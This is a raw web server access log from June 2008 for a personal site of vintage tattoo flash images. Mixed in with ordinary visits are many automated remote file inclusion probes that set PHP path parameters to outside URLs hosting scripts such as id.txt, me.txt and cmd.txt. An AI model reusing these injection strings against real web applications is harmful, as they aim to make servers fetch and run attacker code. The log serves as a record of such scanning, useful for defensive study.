76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:04:53 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:19 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:35 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:35 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:35 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
76.25.130.57 - - [25/Jun/2008:20:06:35 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; NET_mmhpset)"
77.232.68.17 - - [25/Jun/2008:20:07:45 -0500] "GET /logs/?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:07:45 -0500] "GET /logs/?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:07:45 -0500] "GET /?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:07:46 -0500] "GET /?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
211.76.128.155 - - [25/Jun/2008:20:09:12 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
211.76.128.155 - - [25/Jun/2008:20:09:13 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
217.167.194.105 - - [25/Jun/2008:20:12:05 -0500] "GET /logs/phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:20:12:06 -0500] "GET /phphtml.php?htmlclass_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
211.76.128.155 - - [25/Jun/2008:20:12:48 -0500] "GET /logs/?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.79"
211.76.128.155 - - [25/Jun/2008:20:12:50 -0500] "GET /?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
65.214.45.167 - - [25/Jun/2008:20:14:31 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.167 - - [25/Jun/2008:20:14:31 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
72.55.137.141 - - [25/Jun/2008:20:14:34 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
72.55.137.141 - - [25/Jun/2008:20:14:35 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://francealacarte.net/templates/sida6_4.gif????????????????????????????? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
200.203.122.236 - - [25/Jun/2008:20:14:44 -0500] "GET /logs/phphtml.php?htmlclass_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:20:14:46 -0500] "GET /phphtml.php?htmlclass_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:20:15:18 -0500] "GET /logs//atom.php5?page=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:20:15:18 -0500] "GET //atom.php5?page=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.76.128.155 - - [25/Jun/2008:20:15:20 -0500] "GET /logs/?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.79"
211.76.128.155 - - [25/Jun/2008:20:15:23 -0500] "GET /?custompluginfile%5B%5D=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
200.203.122.236 - - [25/Jun/2008:20:15:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:20:15:25 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.149.95.15 - - [25/Jun/2008:20:15:34 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
83.149.95.15 - - [25/Jun/2008:20:15:34 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
217.167.194.105 - - [25/Jun/2008:20:21:16 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
87.106.18.76 - - [25/Jun/2008:20:21:33 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:21:38 -0500] "GET /logs//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:21:44 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.18.76 - - [25/Jun/2008:20:21:50 -0500] "GET //login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=364&w=405&sz=67&hl=en&start=29&um=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26start%3D20%26ndsp%3D20%26um%3D1%26hl%3Den%26safe%3Doff%26sa%3DN""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:22:55 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
70.174.171.79 - - [25/Jun/2008:20:23:07 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
67.18.241.90 - - [25/Jun/2008:20:23:28 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
67.18.241.90 - - [25/Jun/2008:20:23:28 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
200.11.67.242 - - [25/Jun/2008:20:24:08 -0500] "GET /logs//atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:24:09 -0500] "GET //atom.php5?page=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
208.98.1.12 - - [25/Jun/2008:20:24:30 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt?&cmd%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
208.98.1.12 - - [25/Jun/2008:20:24:30 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt?&cmd%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.98.1.12 - - [25/Jun/2008:20:24:30 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt?&cmd%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:20:25:07 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:20:25:07 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
64.185.237.47 - - [25/Jun/2008:20:25:23 -0500] "GET /logs/?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:25:26 -0500] "GET /logs/?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 88963 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:25:29 -0500] "GET /?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:25:32 -0500] "GET /?custompluginfile[]=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
77.232.68.17 - - [25/Jun/2008:20:27:16 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:27:16 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:27:16 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:27:17 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:27:17 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.232.68.17 - - [25/Jun/2008:20:27:18 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.11.67.242 - - [25/Jun/2008:20:28:21 -0500] "GET /logs//atom.php5?page=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:28:21 -0500] "GET //atom.php5?page=http://alaskafamily.net/poll/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
64.185.237.47 - - [25/Jun/2008:20:29:06 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:29:06 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:29:15 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
64.185.237.47 - - [25/Jun/2008:20:29:15 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
87.229.108.123 - - [25/Jun/2008:20:31:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://unnamed1985.awardspace.com/cmd.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.229.108.123 - - [25/Jun/2008:20:31:26 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://unnamed1985.awardspace.com/cmd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:38 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:38 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:39 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:41 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:41 -0500] "GET /logs/access_log.1207785600/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:41 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:41 -0500] "GET /appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:42 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
89.218.85.18 - - [25/Jun/2008:20:31:42 -0500] "GET /logs/appserv/main.php?appserv_root=http://www.grafendorf.info/scripte-php/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
74.6.17.175 - - [25/Jun/2008:20:35:06 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.54 - - [25/Jun/2008:20:35:07 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.11.67.242 - - [25/Jun/2008:20:36:59 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:37:00 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:37:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
200.11.67.242 - - [25/Jun/2008:20:37:24 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
83.222.27.201 - - [25/Jun/2008:20:40:31 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:20:40:32 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
190.196.2.205 - - [25/Jun/2008:20:41:23 -0500] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://www.octava.info/includes/image/idpepez2.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
190.196.2.205 - - [25/Jun/2008:20:41:24 -0500] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://www.octava.info/includes/image/idpepez2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
77.221.157.210 - - [25/Jun/2008:20:41:47 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.157.210 - - [25/Jun/2008:20:41:50 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:20:42:36 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.192.48.40 - - [25/Jun/2008:20:42:57 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.167.194.105 - - [25/Jun/2008:20:43:11 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
217.167.194.105 - - [25/Jun/2008:20:43:12 -0500] "GET //skin/zero_vote/error.php?dir=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.157.210 - - [25/Jun/2008:20:44:28 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:20:45:40 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
83.222.27.201 - - [25/Jun/2008:20:45:40 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
70.231.152.201 - - [25/Jun/2008:20:47:44 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_designer""Opera/9.50 (Windows NT 5.1; U; en)"
70.231.152.201 - - [25/Jun/2008:20:47:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Opera/9.50 (Windows NT 5.1; U; en)"
77.221.157.210 - - [25/Jun/2008:20:48:57 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.157.210 - - [25/Jun/2008:20:48:58 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://www.tripi-ddl.com/video/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
